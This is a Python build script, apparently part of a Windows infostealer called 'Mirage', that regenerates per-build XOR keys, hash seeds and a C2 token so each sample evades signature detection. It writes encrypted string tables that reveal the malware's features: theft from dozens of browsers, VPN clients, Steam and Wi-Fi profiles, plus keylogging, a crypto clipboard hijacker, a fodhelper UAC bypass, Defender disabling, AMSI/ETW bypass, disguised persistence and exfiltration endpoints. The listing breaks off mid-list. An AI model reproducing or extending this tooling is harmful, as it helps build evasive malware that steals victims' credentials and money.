#!/usr/bin/env python3
"""
make_polymorphic.py — Regenerate per-build crypto constants.

Each invocation produces a UNIQUE build:
  - random MIRAGE_SEED          (hash seed)
  - random MIRAGE_STRING_KEY_ENC (16-byte XOR string key)
  - regenerates engine.c XOR-obfuscated export arrays
  - regenerates hashes.h        (kept consistent, used as reference)

Usage: python3 tools/make_polymorphic.py
"""
import os
import random
import re

ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CONFIG_H = os.path.join(ROOT, "include", "config.h")
ENGINE_C = os.path.join(ROOT, "src", "syscalls", "engine.c")
HASHES_H = os.path.join(ROOT, "include", "hashes.h")

# Export names that get XOR-obfuscated in engine.c (fallback path)
EXPORTS = [
    "NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtFreeVirtualMemory",
    "NtWriteVirtualMemory", "NtReadVirtualMemory", "NtClose",
    "NtQuerySystemInformation", "NtQueryInformationProcess", "NtDelayExecution",
    "NtOpenFile", "NtWriteFile", "NtSetInformationProcess", "NtOpenKey",
    "NtQueryValueKey", "NtOpenProcess", "NtCreateThreadEx",
    "NtFlushInstructionCache", "NtCreateEvent", "NtDeleteFile",
    "NtSetInformationFile", "NtCreateFile", "NtEnumerateKey",
]
MODULES = ["ntdll.dll", "win32u.dll"]

# Keep the export-name list above in sync with the one in engine.c.
# The obfuscated array name is derived: "NtFoo" -> _NtFoo_obf


def rotl32(v, n):
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF


def gen_seed():
    while True:
        s = random.getrandbits(32)
        if s != 0:
            return s


def gen_key():
    return bytes(random.getrandbits(8) for _ in range(16))


def c_hex_array(data):
    return ", ".join(f"0x{b:02x}" for b in data)


def xor_string(s, key):
    return bytes(ord(s[i]) ^ key[i % 16] for i in range(len(s)))


def hash_bytes(data, seed, iterations):
    h = seed
    for b in data:
        for _ in range(iterations):
            h = rotl32(h, 5)
            h = (h ^ b) & 0xFFFFFFFF
            h = (h * 0x1B873593 + 0x85EBCA6B) & 0xFFFFFFFF
    return h


def hash_module(s, seed, key):
    enc = bytes(ord(s[i]) ^ key[i % 16] for i in range(len(s)))
    # case-insensitive fold
    data = bytearray()
    for b in enc:
        if 0x41 <= b <= 0x5A:
            b += 32
        data.append(b)
    return hash_bytes(data, seed, 28)


def hash_func(s, seed, key):
    enc = bytes(ord(s[i]) ^ key[i % 16] for i in range(len(s)))
    return hash_bytes(enc, seed, 27)


def rewrite_config(seed, key):
    with open(CONFIG_H, "r", encoding="utf-8") as f:
        text = f.read()

    # MIRAGE_SEED
    text = re.sub(
        r"#define MIRAGE_SEED\s+0x[0-9a-fA-F]+",
        f"#define MIRAGE_SEED            0x{seed:08X}",
        text,
        count=1,
    )

    # MIRAGE_STRING_KEY_ENC block (two comment lines + closing)
    key_line = "    " + ", ".join(f"0x{b:02x}" for b in key) + "   /* polymorphic */"
    pattern = re.compile(
        r"static const unsigned char MIRAGE_STRING_KEY_ENC\[16\] = \{[^}]*\}[,;]?\s*"
    )
    new_block = (
        "static const unsigned char MIRAGE_STRING_KEY_ENC[16] = {\n"
        f"{key_line}\n"
        "};\n"
    )
    text, n = pattern.subn(new_block, text, count=1)
    if n != 1:
        raise SystemExit("[!] config.h: MIRAGE_STRING_KEY_ENC block not found")

    with open(CONFIG_H, "w", encoding="utf-8") as f:
        f.write(text)


def rewrite_c2_token():
    token = ''.join(random.choices('0123456789abcdef', k=32))
    with open(CONFIG_H, 'r', encoding='utf-8') as f:
        text = f.read()
    text = re.sub(
        r'(#define C2_TOKEN\s+)"[^"]*"',
        f'\\1"{token}"',
        text,
        count=1,
    )
    text = re.sub(
        r'#warning "C2_TOKEN.*',
        '#warning "C2_TOKEN auto-generated by make_polymorphic.py"',
        text,
        count=1,
    )
    with open(CONFIG_H, 'w', encoding='utf-8') as f:
        f.write(text)
    print(f'[+] C2_TOKEN = {token}')

def rewrite_engine(seed, key):
    with open(ENGINE_C, "r", encoding="utf-8") as f:
        text = f.read()

    start_marker = "/* ═══════ XOR-obfuscated export names ══════════════════════════ */"
    end_marker = "static void deobf_str"
    start = text.index(start_marker)
    end = text.index(end_marker)
    if start < 0 or end < 0:
        raise SystemExit("[!] engine.c: obfuscated block markers not found")

    lines = [start_marker, ""]
    for name in EXPORTS:
        obf = xor_string(name, key)
        var = name.replace(".", "_")
        lines.append(
            f"static const unsigned char _{var}_obf[{len(obf)}] = "
            f"{{ {c_hex_array(obf)} }};"
        )
    obf = xor_string("ntdll.dll", key)
    lines.append(
        f"static const unsigned char _ntdll_dll_obf[{len(obf)}] = "
        f"{{ {c_hex_array(obf)} }};"
    )
    lines.append("")

    new_block = "\n".join(lines)
    text = text[:start] + new_block + text[end:]

    with open(ENGINE_C, "w", encoding="utf-8") as f:
        f.write(text)


def rewrite_encrypted_strings(key):
    """Generate enc_strings.h with XOR-encrypted string arrays for all sensitive strings."""
    enc_strings_h = os.path.join(ROOT, "include", "enc_strings.h")

    # Master list of all sensitive strings to encrypt
    # Category prefix determines the C identifier: enc_<sanitized_name>
    strings = [
        # DLL names
        ("ntdll", "ntdll.dll"),
        ("kernel32", "kernel32.dll"),
        ("advapi32", "advapi32.dll"),
        ("user32", "user32.dll"),
        ("rstrtmgr", "rstrtmgr.dll"),
        ("gdi32", "gdi32.dll"),
        ("ws2_32", "ws2_32.dll"),
        ("shell32", "shell32.dll"),
        ("crypt32", "crypt32.dll"),
        ("bcrypt", "bcrypt.dll"),
        ("ole32", "ole32.dll"),
        ("oleaut32", "oleaut32.dll"),
        ("ncrypt", "ncrypt.dll"),
        ("secur32", "secur32.dll"),
        # Function names (for PEB-walk resolution)
        ("FindFirstFileA", "FindFirstFileA"),
        ("FindNextFileA", "FindNextFileA"),
        ("FindClose", "FindClose"),
        ("CreateFileA", "CreateFileA"),
        ("ReadFile", "ReadFile"),
        ("WriteFile", "WriteFile"),
        ("CreateDirectoryA", "CreateDirectoryA"),
        ("GetFileAttributesA", "GetFileAttributesA"),
        ("CopyFileA", "CopyFileA"),
        ("DeleteFileA", "DeleteFileA"),
        ("MoveFileA", "MoveFileA"),
        ("GetEnvironmentVariableA", "GetEnvironmentVariableA"),
        ("SetWindowsHookExW", "SetWindowsHookExW"),
        ("CallNextHookEx", "CallNextHookEx"),
        ("UnhookWindowsHookEx", "UnhookWindowsHookEx"),
        ("GetKeyState", "GetKeyState"),
        ("GetForegroundWindow", "GetForegroundWindow"),
        ("GetWindowTextW", "GetWindowTextW"),
        ("GetAsyncKeyState", "GetAsyncKeyState"),
        ("MapVirtualKeyW", "MapVirtualKeyW"),
        ("GetKeyboardLayout", "GetKeyboardLayout"),
        ("ToUnicodeEx", "ToUnicodeEx"),
        ("GetTickCount64", "GetTickCount64"),
        ("GetTickCount", "GetTickCount"),
        ("GetDC", "GetDC"),
        ("ReleaseDC", "ReleaseDC"),
        ("CreateCompatibleDC", "CreateCompatibleDC"),
        ("DeleteDC", "DeleteDC"),
        ("CreateCompatibleBitmap", "CreateCompatibleBitmap"),
        ("SelectObject", "SelectObject"),
        ("BitBlt", "BitBlt"),
        ("GetDIBits", "GetDIBits"),
        ("DeleteObject", "DeleteObject"),
        ("OpenClipboard", "OpenClipboard"),
        ("CloseClipboard", "CloseClipboard"),
        ("GetClipboardData", "GetClipboardData"),
        ("GlobalLock", "GlobalLock"),
        ("GlobalUnlock", "GlobalUnlock"),
        ("EmptyClipboard", "EmptyClipboard"),
        ("SetClipboardData", "SetClipboardData"),
        ("GlobalAlloc", "GlobalAlloc"),
        ("RegOpenKeyExW", "RegOpenKeyExW"),
        ("RegCreateKeyExW", "RegCreateKeyExW"),
        ("RegSetValueExW", "RegSetValueExW"),
        ("RegDeleteKeyW", "RegDeleteKeyW"),
        ("RegCloseKey", "RegCloseKey"),
        ("RegQueryValueExW", "RegQueryValueExW"),
        ("RegOpenKeyExA", "RegOpenKeyExA"),
        ("RegQueryValueExA", "RegQueryValueExA"),
        ("CreateProcessA", "CreateProcessA"),
        ("VirtualAllocEx", "VirtualAllocEx"),
        ("WriteProcessMemory", "WriteProcessMemory"),
        ("CreateRemoteThread", "CreateRemoteThread"),
        ("OpenProcess", "OpenProcess"),
        ("GetModuleHandleA", "GetModuleHandleA"),
        ("GetModuleHandleW", "GetModuleHandleW"),
        ("GetProcAddress", "GetProcAddress"),
        ("LoadLibraryA", "LoadLibraryA"),
        ("HeapAlloc", "HeapAlloc"),
        ("HeapFree", "HeapFree"),
        ("HeapReAlloc", "HeapReAlloc"),
        ("GetProcessHeap", "GetProcessHeap"),
        ("GetComputerNameA", "GetComputerNameA"),
        ("GetDiskFreeSpaceExA", "GetDiskFreeSpaceExA"),
        ("GetCursorPos", "GetCursorPos"),
        ("GetKeyboardLayoutList", "GetKeyboardLayoutList"),
        ("GetSystemDefaultLangID", "GetSystemDefaultLangID"),
        ("GetTimeZoneInformation", "GetTimeZoneInformation"),
        ("LookupPrivilegeValueW", "LookupPrivilegeValueW"),
        ("AdjustTokenPrivileges", "AdjustTokenPrivileges"),
        ("OpenProcessToken", "OpenProcessToken"),
        ("GetSystemTimeAsFileTime", "GetSystemTimeAsFileTime"),
        ("GetFileSize", "GetFileSize"),
        ("SetFilePointer", "SetFilePointer"),
        ("SetFilePointerEx", "SetFilePointerEx"),
        ("FlushFileBuffers", "FlushFileBuffers"),
        ("MultiByteToWideChar", "MultiByteToWideChar"),
        ("WideCharToMultiByte", "WideCharToMultiByte"),
        ("GetLogicalDriveStringsW", "GetLogicalDriveStringsW"),
        ("QueryDosDeviceW", "QueryDosDeviceW"),
        ("CreateToolhelp32Snapshot", "CreateToolhelp32Snapshot"),
        ("Process32FirstW", "Process32FirstW"),
        ("Process32NextW", "Process32NextW"),
        ("GetSystemMetrics", "GetSystemMetrics"),
        ("CloseHandle", "CloseHandle"),
        ("FindWindowW", "FindWindowW"),
        ("GetWindowThreadProcessId", "GetWindowThreadProcessId"),
        ("DuplicateTokenEx", "DuplicateTokenEx"),
        ("ImpersonateLoggedOnUser", "ImpersonateLoggedOnUser"),
        ("RevertToSelf", "RevertToSelf"),
        ("VirtualAlloc", "VirtualAlloc"),
        ("RtlGetVersion", "RtlGetVersion"),
        # Winsock APIs
        ("WSAStartup", "WSAStartup"),
        ("WSACleanup", "WSACleanup"),
        ("socket", "socket"),
        ("connect", "connect"),
        ("send", "send"),
        ("recv", "recv"),
        ("closesocket", "closesocket"),
        ("getaddrinfo", "getaddrinfo"),
        ("freeaddrinfo", "freeaddrinfo"),
        ("inet_addr", "inet_addr"),
        ("htons", "htons"),
        # NCrypt APIs
        ("NCryptOpenStorageProvider", "NCryptOpenStorageProvider"),
        ("NCryptOpenKey", "NCryptOpenKey"),
        ("NCryptDecrypt", "NCryptDecrypt"),
        ("NCryptFreeObject", "NCryptFreeObject"),
        # BCrypt APIs
        ("BCryptOpenAlgorithmProvider", "BCryptOpenAlgorithmProvider"),
        ("BCryptCloseAlgorithmProvider", "BCryptCloseAlgorithmProvider"),
        ("BCryptSetProperty", "BCryptSetProperty"),
        ("BCryptGenerateSymmetricKey", "BCryptGenerateSymmetricKey"),
        ("BCryptDeriveKeyPBKDF2", "BCryptDeriveKeyPBKDF2"),
        ("BCryptDecrypt", "BCryptDecrypt"),
        ("BCryptDestroyKey", "BCryptDestroyKey"),
        ("BCryptCreateHash", "BCryptCreateHash"),
        ("BCryptHashData", "BCryptHashData"),
        ("BCryptFinishHash", "BCryptFinishHash"),
        ("BCryptDestroyHash", "BCryptDestroyHash"),
        ("BCryptGenRandom", "BCryptGenRandom"),
        # Crypt32 / DPAPI
        ("CryptUnprotectData", "CryptUnprotectData"),
        ("CryptAcquireContextA", "CryptAcquireContextA"),
        ("CryptGenRandom", "CryptGenRandom"),
        ("CryptReleaseContext", "CryptReleaseContext"),
        # Advapi32
        ("SystemFunction036", "SystemFunction036"),
        # COM (ole32)
        ("CoInitializeEx", "CoInitializeEx"),
        ("CoCreateInstance", "CoCreateInstance"),
        ("CoSetProxyBlanket", "CoSetProxyBlanket"),
        ("CoUninitialize", "CoUninitialize"),
        # Advapi32 SID
        ("AllocateAndInitializeSid", "AllocateAndInitializeSid"),
        ("CheckTokenMembership", "CheckTokenMembership"),
        ("FreeSid", "FreeSid"),
        # Kernel32
        ("CreateProcessW", "CreateProcessW"),
        ("RegDeleteValueW", "RegDeleteValueW"),
        ("WaitForSingleObject", "WaitForSingleObject"),
        ("ExitProcess", "ExitProcess"),
        ("VirtualFree", "VirtualFree"),
        ("VirtualFreeEx", "VirtualFreeEx"),
        ("CreateThread", "CreateThread"),
        ("Sleep", "Sleep"),
        ("GetCurrentProcess", "GetCurrentProcess"),
        ("GetCurrentProcessId", "GetCurrentProcessId"),
        ("GetLastError", "GetLastError"),
        ("TerminateProcess", "TerminateProcess"),
        ("GetCommandLineA", "GetCommandLineA"),
        ("GetModuleFileNameA", "GetModuleFileNameA"),
        ("GetTempPathA", "GetTempPathA"),
        ("GetLocalTime", "GetLocalTime"),
        ("GetFinalPathNameByHandleW", "GetFinalPathNameByHandleW"),
        ("SHGetFolderPathA", "SHGetFolderPathA"),
        ("LocalFree", "LocalFree"),
        ("ResumeThread", "ResumeThread"),
        ("GetExitCodeThread", "GetExitCodeThread"),
        ("InitializeCriticalSection", "InitializeCriticalSection"),
        ("DeleteCriticalSection", "DeleteCriticalSection"),
        ("EnterCriticalSection", "EnterCriticalSection"),
        ("LeaveCriticalSection", "LeaveCriticalSection"),
        # Winsock extras
        ("WSASocketW", "WSASocketW"),
        ("accept", "accept"),
        ("bind", "bind"),
        ("listen", "listen"),
        ("setsockopt", "setsockopt"),
        ("getsockname", "getsockname"),
        ("htonl", "htonl"),
        ("ntohs", "ntohs"),
        # OLE/COM helpers
        ("SysAllocStringByteLen", "SysAllocStringByteLen"),
        ("SysFreeString", "SysFreeString"),
        ("SysStringByteLen", "SysStringByteLen"),
        # crypt32 PEB-walk
        ("CertFreeCertificateContext", "CertFreeCertificateContext"),
        # User32 GUI
        ("CreateWindowExW", "CreateWindowExW"),
        ("RegisterClassW", "RegisterClassW"),
        ("DefWindowProcW", "DefWindowProcW"),
        ("DispatchMessageW", "DispatchMessageW"),
        ("GetMessageW", "GetMessageW"),
        ("TranslateMessage", "TranslateMessage"),
        ("PostMessageW", "PostMessageW"),
        ("DestroyWindow", "DestroyWindow"),
        ("PostQuitMessage", "PostQuitMessage"),
        ("wsprintfW", "wsprintfW"),
        ("WinExec", "WinExec"),
        ("VirtualProtect", "VirtualProtect"),
        # Nt syscalls (for PEB-walk resolution in detection/browser/cleanup)
        ("NtAllocateVirtualMemory", "NtAllocateVirtualMemory"),
        ("NtClose", "NtClose"),
        ("NtCreateFile", "NtCreateFile"),
        ("NtCreateSection", "NtCreateSection"),
        ("NtCreateThreadEx", "NtCreateThreadEx"),
        ("NtDelayExecution", "NtDelayExecution"),
        ("NtFlushInstructionCache", "NtFlushInstructionCache"),
        ("NtFreeVirtualMemory", "NtFreeVirtualMemory"),
        ("NtGetNextProcess", "NtGetNextProcess"),
        ("NtMapViewOfSection", "NtMapViewOfSection"),
        ("NtOpenFile", "NtOpenFile"),
        ("NtOpenKey", "NtOpenKey"),
        ("NtOpenProcess", "NtOpenProcess"),
        ("NtProtectVirtualMemory", "NtProtectVirtualMemory"),
        ("NtQueryInformationProcess", "NtQueryInformationProcess"),
        ("NtQuerySystemInformation", "NtQuerySystemInformation"),
        ("NtQueryValueKey", "NtQueryValueKey"),
        ("NtReadVirtualMemory", "NtReadVirtualMemory"),
        ("NtSetInformationProcess", "NtSetInformationProcess"),
        ("NtTerminateProcess", "NtTerminateProcess"),
        ("NtWriteFile", "NtWriteFile"),
        ("NtWriteVirtualMemory", "NtWriteVirtualMemory"),
        # Additional APIs not yet in list
        ("CopyFileW", "CopyFileW"),
        ("CreateFileMappingA", "CreateFileMappingA"),
        ("DeleteFileW", "DeleteFileW"),
        ("FindFirstFileW", "FindFirstFileW"),
        ("FindNextFileW", "FindNextFileW"),
        ("GetClipboardSequenceNumber", "GetClipboardSequenceNumber"),
        ("GetEnvironmentVariableW", "GetEnvironmentVariableW"),
        ("GetModuleFileNameW", "GetModuleFileNameW"),
        ("GetTempPathW", "GetTempPathW"),
        ("LdrGetProcedureAddress", "LdrGetProcedureAddress"),
        ("LdrLoadDll", "LdrLoadDll"),
        ("MapViewOfFile", "MapViewOfFile"),
        ("MoveFileExW", "MoveFileExW"),
        ("RmEndSession", "RmEndSession"),
        ("RmGetList", "RmGetList"),
        ("RmRegisterResources", "RmRegisterResources"),
        ("RmStartSession", "RmStartSession"),
        ("UnmapViewOfFile", "UnmapViewOfFile"),
        # Registry paths (narrow)
        ("reg_defender", "SOFTWARE\\\\Microsoft\\\\Windows Defender"),
        ("reg_mssettings", "Software\\\\Classes\\\\ms-settings"),
        ("reg_steam", "SOFTWARE\\\\Valve\\\\Steam"),
        ("reg_environment", "Environment"),
        # HTTP endpoints
        ("boundary_mirage", "----MirageBoundary"),
        ("boundary_zialfi_chunk", "----ZialfiChunkBoundary7XkR9fL2"),
        ("boundary_zialfi_complete", "----ZialfiCompleteBoundary1Yz8Wk3P"),
        ("api_log", "/api/log"),
        ("api_log_chunk", "/api/log/chunk"),
        ("api_log_complete", "/api/log/complete"),
        ("github_api", "api.github.com"),
        ("github_releases_path", "/repos/{s}/{s}/releases/latest"),
        ("telegram_host", "t.me"),
        ("telegram_path", "/s/{s}"),
        # Persistence names
        ("persist_mirage_update", "MirageUpdate"),
        ("persist_windows_helper", "WindowsHelper.exe"),
        ("persist_windows_update", "WindowsUpdate"),
        ("persist_notepad", "notepad.exe"),
        # Wide registry paths (UTF-16LE bytes, XOR'd)
        ("wreg_defender", "SOFTWARE\\Policies\\Microsoft\\Windows Defender"),
        ("wreg_mssettings", "Software\\Classes\\ms-settings\\Shell\\Open\\Command"),
        # Phase 31: Remaining wide strings (defender_disable, uac_bypass, elevator, cdp_grabber)
        ("wreg_windefend", "SYSTEM\\CurrentControlSet\\Services\\WinDefend"),
        ("wDisableAntiSpyware", "DisableAntiSpyware"),
        ("wStart", "Start"),
        ("wDelegateExecute", "DelegateExecute"),
        ("wfodhelper", "C:\\Windows\\System32\\fodhelper.exe"),
        ("wShell_TrayWnd", "Shell_TrayWnd"),
        ("wwinlogon", "winlogon"),
        ("wchrome_app_path", "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe"),
        ("wmirage_chrome", "mirage_chrome"),
        ("wLocalState", "\\Local State"),
        ("wLOCALAPPDATA", "LOCALAPPDATA"),
        ("wAPPDATA", "APPDATA"),
        ("wprofilesini", "\\profiles.ini"),
        # Phase 31: cdp_grabber.c narrow API name
        ("RemoveDirectoryW", "RemoveDirectoryW"),
        # Phase 31: Browser table entries (auto-generated)
        # Process names
        ("bp_proc_0", "chrome"),
        ("bp_proc_1", "msedge"),
        ("bp_proc_2", "brave"),
        ("bp_proc_3", "opera"),
        ("bp_proc_4", "vivaldi"),
        ("bp_proc_5", "browser"),
        ("bp_proc_6", "amigo"),
        ("bp_proc_7", "torch"),
        ("bp_proc_8", "kometa"),
        ("bp_proc_9", "orbitum"),
        ("bp_proc_10", "iridium"),
        ("bp_proc_11", "dragon"),
        ("bp_proc_12", "slimjet"),
        ("bp_proc_13", "360se"),
        ("bp_proc_14", "fenrir"),
        ("bp_proc_15", "citrio"),
        ("bp_proc_16", "liebao"),
        ("bp_proc_17", "maxthon"),
        ("bp_proc_18", "kmeleon"),
        ("bp_proc_19", "avastbrowser"),
        ("bp_proc_20", "ccbrowser"),
        ("bp_proc_21", "ucbrowser"),
        ("bp_proc_22", "qqbrowser"),
        ("bp_proc_23", "superbird"),
        ("bp_proc_24", "sleipnir"),
        ("bp_proc_25", "atom"),
        # Browser display names
        ("bp_name_0", "Chrome"),
        ("bp_name_1", "Chrome (x86)"),
        ("bp_name_2", "Chrome SxS"),
        ("bp_name_3", "Edge"),
        ("bp_name_4", "Brave"),
        ("bp_name_5", "Opera"),
        ("bp_name_6", "Opera GX"),
        ("bp_name_7", "Vivaldi"),
        ("bp_name_8", "Yandex"),
        ("bp_name_9", "Chromium"),
        ("bp_name_10", "CentBrowser"),
        ("bp_name_11", "CocCoc"),
        ("bp_name_12", "Amigo"),
        ("bp_name_13", "Torch"),
        ("bp_name_14", "Kometa"),
        ("bp_name_15", "Orbitum"),
        ("bp_name_16", "7Star"),
        ("bp_name_17", "Sputnik"),
        ("bp_name_18", "Iridium"),
        ("bp_name_19", "Dragon"),
        ("bp_name_20", "Epic"),
        ("bp_name_21", "Uran"),
        ("bp_name_22", "Slimjet"),
        ("bp_name_23", "Chedot"),
        ("bp_name_24", "Elements Browser"),
        ("bp_name_25", "QIP Surf"),
        ("bp_name_26", "360Browser"),
        ("bp_name_27", "DCBrowser"),
        ("bp_name_28", "UR Browser"),
        ("bp_name_29", "Maple"),
        ("bp_name_30", "Fenrir"),
        ("bp_name_31", "Catalina"),
        ("bp_name_32", "Coowon"),
        ("bp_name_33", "Liebao"),
        ("bp_name_34", "Maxthon"),
        ("bp_name_35", "K-Melon"),
        ("bp_name_36", "Chrome Canary"),
        ("bp_name_37", "Chrome Dev"),
        ("bp_name_38", "Chrome Beta"),
        ("bp_name_39", "Edge Beta"),
        ("bp_name_40", "Edge Dev"),
        ("bp_name_41", "Edge Canary"),
        ("bp_name_42", "Brave Beta"),
        ("bp_name_43", "Brave Nightly"),
        ("bp_name_44", "Opera Beta"),
        ("bp_name_45", "Opera Crypto"),
        ("bp_name_46", "CryptoTab"),
        ("bp_name_47", "Avast Secure"),
        ("bp_name_48", "CCleaner"),
        ("bp_name_49", "UC Browser"),
        ("bp_name_50", "QQ Browser"),
        ("bp_name_51", "360 Browser"),
        ("bp_name_52", "Elements"),
        ("bp_name_53", "Superbird"),
        ("bp_name_54", "Sleipnir"),
        ("bp_name_55", "Mail.ru Atom"),
        # Browser paths
        ("bp_path_0", "Google\\\\Chrome\\\\User Data"),
        ("bp_path_1", "Google(x86)\\\\Chrome\\\\User Data"),
        ("bp_path_2", "Google\\\\Chrome SxS\\\\User Data"),
        ("bp_path_3", "Microsoft\\\\Edge\\\\User Data"),
        ("bp_path_4", "BraveSoftware\\\\Brave-Browser\\\\User Data"),
        ("bp_path_5", "Opera Software\\\\Opera Stable"),
        ("bp_path_6", "Opera Software\\\\Opera GX Stable"),
        ("bp_path_7", "Vivaldi\\\\User Data"),
        ("bp_path_8", "Yandex\\\\YandexBrowser\\\\User Data"),
        ("bp_path_9", "Chromium\\\\User Data"),
        ("bp_path_10", "CentBrowser\\\\User Data"),
        ("bp_path_11", "CocCoc\\\\Browser\\\\User Data"),
        ("bp_path_12", "Amigo\\\\User Data"),
        ("bp_path_13", "Torch\\\\User Data"),
        ("bp_path_14", "Kometa\\\\User Data"),
        ("bp_path_15", "Orbitum\\\\User Data"),
        ("bp_path_16", "7Star\\\\7Star\\\\User Data"),
        ("bp_path_17", "Sputnik\\\\Sputnik\\\\User Data"),
        ("bp_path_18", "Iridium\\\\User Data"),
        ("bp_path_19", "Dragon\\\\User Data"),
        ("bp_path_20", "Epic Privacy Browser\\\\User Data"),
        ("bp_path_21", "Uran\\\\User Data"),
        ("bp_path_22", "Slimjet\\\\User Data"),
        ("bp_path_23", "Chedot\\\\User Data"),
        ("bp_path_24", "Elements Browser\\\\User Data"),
        ("bp_path_25", "QIP Surf\\\\User Data"),
        ("bp_path_26", "360Browser\\\\Browser\\\\User Data"),
        ("bp_path_27", "DCBrowser\\\\User Data"),
        ("bp_path_28", "UR Browser\\\\User Data"),
        ("bp_path_29", "MapleStudio\\\\ChromePlus\\\\User Data"),
        ("bp_path_30", "Fenrir\\\\User Data"),
        ("bp_path_31", "CatalinaGroup\\\\Citrio\\\\User Data"),
        ("bp_path_32", "Coowon\\\\User Data"),
        ("bp_path_33", "Liebao\\\\User Data"),
        ("bp_path_34", "Maxthon5\\\\User Data"),
        ("bp_path_35", "K-Melon\\\\User Data"),
        ("bp_path_36", "Chrome SxS\\\\User Data"),
        ("bp_path_37", "Chrome Dev\\\\User Data"),
        ("bp_path_38", "Chrome Beta\\\\User Data"),
        ("bp_path_39", "Edge Beta\\\\User Data"),
        ("bp_path_40", "Edge Dev\\\\User Data"),
        ("bp_path_41", "Edge Canary\\\\User Data"),
        ("bp_path_42", "Brave-Browser-Beta\\\\User Data"),
        ("bp_path_43", "Brave-Browser-Nightly\\\\User Data"),
        ("bp_path_44", "Opera Software\\\\Opera Beta"),
        ("bp_path_45", "Opera Software\\\\Opera Crypto"),
        ("bp_path_46", "CryptoTab\\\\User Data"),
        ("bp_path_47", "Avast Secure Browser\\\\User Data"),
        ("bp_path_48", "CCBrowser\\\\User Data"),
        ("bp_path_49", "UCBrowser\\\\User Data"),
        ("bp_path_50", "QQBrowser\\\\User Data"),
        ("bp_path_51", "Superbird\\\\User Data"),
        ("bp_path_52", "Sleipnir\\\\User Data"),
        ("bp_path_53", "Mail.ru\\\\Atom\\\\User Data"),
        # Config values
        ("changeme", "changeme"),
        # Phase 35: Browser stem names for encrypted g_browser_stems[]
        ("bp_stem_chrome", "chrome"),
        ("bp_stem_msedge", "msedge"),
        ("bp_stem_brave", "brave"),
        ("bp_stem_opera", "opera"),
        ("bp_stem_vivaldi", "vivaldi"),
        ("bp_stem_chromium", "chromium"),
        ("bp_stem_slimjet", "slimjet"),
        ("bp_stem_yandex", "yandex"),
        ("bp_stem_iron", "iron"),
        ("bp_stem_falkon", "falkon"),
        ("bp_stem_seamonkey", "seamonkey"),
        ("bp_stem_waterfox", "waterfox"),
        ("bp_stem_palemoon", "palemoon"),
        ("bp_stem_basilisk", "basilisk"),
        # Phase 35: strstr comparison strings for chromium.c
        ("bp_cmp_edge", "Microsoft\\Edge"),
        ("bp_cmp_brave", "BraveSoftware"),
        ("bp_cmp_avast", "AVAST Software"),
        ("bp_cmp_yandex", "Yandex"),
        ("bp_cmp_chrome", "Chrome"),
        # Phase 35: kill_browser_processes target
        ("bp_kill_chrome", "chrome"),
        # NtDuplicateObject + NtUnmapViewOfSection (encrypted, no plaintext fallback)
        ("nt_dup_obj", "NtDuplicateObject"),
        ("nt_unmap_view", "NtUnmapViewOfSection"),
        # wlanapi.dll + Wlan* functions
        ("wlanapi", "wlanapi.dll"),
        ("WlanOpenHandle", "WlanOpenHandle"),
        ("WlanEnumInterfaces", "WlanEnumInterfaces"),
        ("WlanGetProfileList", "WlanGetProfileList"),
        ("WlanGetProfile", "WlanGetProfile"),
        ("WlanFreeMemory", "WlanFreeMemory"),
        ("WlanCloseHandle", "WlanCloseHandle"),
        # Gecko browser table (10 browsers × 3 fields)
        ("gecko_firefox_name", "Firefox"),
        ("gecko_firefox_path", "Mozilla\\Firefox\\Profiles"),
        ("gecko_firefox_proc", "firefox"),
        ("gecko_waterfox_name", "Waterfox"),
        ("gecko_waterfox_path", "Waterfox\\Profiles"),
        ("gecko_waterfox_proc", "waterfox"),
        ("gecko_palemoon_name", "Pale Moon"),
        ("gecko_palemoon_path", "Moon\\Profiles"),
        ("gecko_palemoon_proc", "palemoon"),
        ("gecko_seamonkey_name", "SeaMonkey"),
        ("gecko_seamonkey_path", "SeaMonkey\\Profiles"),
        ("gecko_seamonkey_proc", "seamonkey"),
        ("gecko_icedragon_name", "IceDragon"),
        ("gecko_icedragon_path", "Cyberfox\\Profiles"),
        ("gecko_icedragon_proc", "icedragon"),
        ("gecko_basilisk_name", "Basilisk"),
        ("gecko_basilisk_path", "Basilisk\\Profiles"),
        ("gecko_basilisk_proc", "basilisk"),
        ("gecko_kmeleon_name", "K-Meleon"),
        ("gecko_kmeleon_path", "K-Meleon\\Profiles"),
        ("gecko_kmeleon_proc", "kmeleon"),
        ("gecko_icecat_name", "GNU IceCat"),
        ("gecko_icecat_path", "IceCat\\Profiles"),
        ("gecko_icecat_proc", "icecat"),
        ("gecko_swiftweasel_name", "Swiftweasel"),
        ("gecko_swiftweasel_path", "Swiftweasel\\Profiles"),
        ("gecko_swiftweasel_proc", "swiftweasel"),
        ("gecko_floorp_name", "Floorp"),
        ("gecko_floorp_path", "Floorp\\Profiles"),
        ("gecko_floorp_proc", "floorp"),

        # AMSI/ETW bypass API names (Phase 2)
        ("AmsiScanBuffer", "AmsiScanBuffer"),
        ("EtwEventWrite", "EtwEventWrite"),
        ("EtwEventWriteEx", "EtwEventWriteEx"),
        ("RtlAddVectoredExceptionHandler", "RtlAddVectoredExceptionHandler"),
        ("RtlRemoveVectoredExceptionHandler", "RtlRemoveVectoredExceptionHandler"),
        # Phase 3: Remaining plaintext strings
        # proxy.c C2 identifiers
        ("c2_prefix", "c2://"),
        ("mirage_c2_channel", "mirage_c2"),
        # schannel.c
        ("unisp_name_a", "UNISP_NAME_A"),
        # chrome_crypto.c
        ("saltysalt", "saltysalt"),
        # gaming.c
        ("steam_path_val", "SteamPath"),
        # clipper.c
        ("btc_addr", "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),
        ("eth_addr", "0x0000000000000000000000000000000000000000"),
        ("ltc_addr", "ltc1qw508d6qejxtdg4y5r3zarvary0c5xw7kgmn4n9"),
        # vpn.c
        ("vpn_nordvpn", "NordVPN"),
        ("vpn_openvpn", "OpenVPN"),
        ("vpn_wireguard", "WireGuard"),
        ("vpn_surfshark", "SurfShark"),
        ("vpn_expressvpn", "ExpressVPN"),
        ("vpn_cyberghost", "CyberGhost"),
        ("vpn_pia", "PIA"),
        ("vpn_mullvad", "Mullvad"),
        ("vpn_windscribe", "Windscribe"),
        ("vpn_tunnelbear", "TunnelBear"),
        ("vpn_hotspotshield", "Hotspot Shield"),
        ("vpn_vyprvpn", "VyprVPN"),
        ("vpn_hamachi", "Hamachi"),
        ("vpn_hidemyname", "HideMyName"),
